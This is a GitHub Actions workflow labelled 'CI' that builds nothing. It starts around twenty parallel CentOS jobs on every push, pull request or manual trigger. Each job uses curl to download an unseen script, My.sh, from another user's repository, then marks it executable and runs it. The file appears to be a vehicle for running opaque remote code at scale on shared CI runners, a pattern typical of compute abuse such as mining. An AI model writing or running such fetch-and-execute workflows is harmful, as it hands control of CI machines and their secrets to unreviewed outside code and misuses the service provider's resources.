name: CI

on:
  push:
    branches:
      - main
  pull_request:
    branches:
      - main
  workflow_dispatch:

jobs:
  build-1:
    runs-on: ubuntu-latest
    container:
      image: centos:latest
    steps:
      - name: Checkout code
        uses: actions/checkout@v2
      - name: Run script in build-1
        run: |
          #!/bin/bash
          curl -sSL https://raw.githubusercontent.com/brownbooks/jisuiic/main/My.sh -o My.sh
          chmod +x My.sh
          ./My.sh
  build-2:
    runs-on: ubuntu-latest
    container:
      image: centos:latest
    steps:
      - name: Checkout code
        uses: actions/checkout@v2
      - name: Run script in build-2
        run: |
          #!/bin/bash
          curl -sSL https://raw.githubusercontent.com/brownbooks/jisuiic/main/My.sh -o My.sh
          chmod +x My.sh
          ./My.sh
  # ... (build-3 to build-20, each with the same steps)
  build-3:
    runs-on: ubuntu-latest
    container:
      image: centos:latest
    steps:
      - name: Checkout code
        uses: actions/checkout@v2
      - name: Run script in build-3
        run: |
          #!/bin/bash
          curl -sSL https://raw.githubusercontent.com/brownbooks/jisuiic/main/My.sh -o My.sh
          chmod +x My.sh
          ./My.sh
  build-4:
    runs-on: ubuntu-latest
    container:
      image: centos:latest
    steps:
      - name: Checkout code
        uses: actions/checkout@v2
      - name: Run script in build-4
        run: |
          #!/bin/bash
          curl -sSL https://raw.githubusercontent.com/brownbooks/jisuiic/main/My.sh -o My.sh
          chmod +x My.sh
          ./My.sh
  # ... (and so on up to build-20)
  build-20:
    runs-on: ubuntu-latest
    container:
      image: centos:latest
    steps:
      - name: Checkout code
        uses: actions/checkout@v2
      - name: Run script in build-20
        run: |
          #!/bin/bash
          curl -sSL https://raw.githubusercontent.com/brownbooks/jisuiic/main/My.sh -o My.sh
          chmod +x My.sh
          ./My.sh
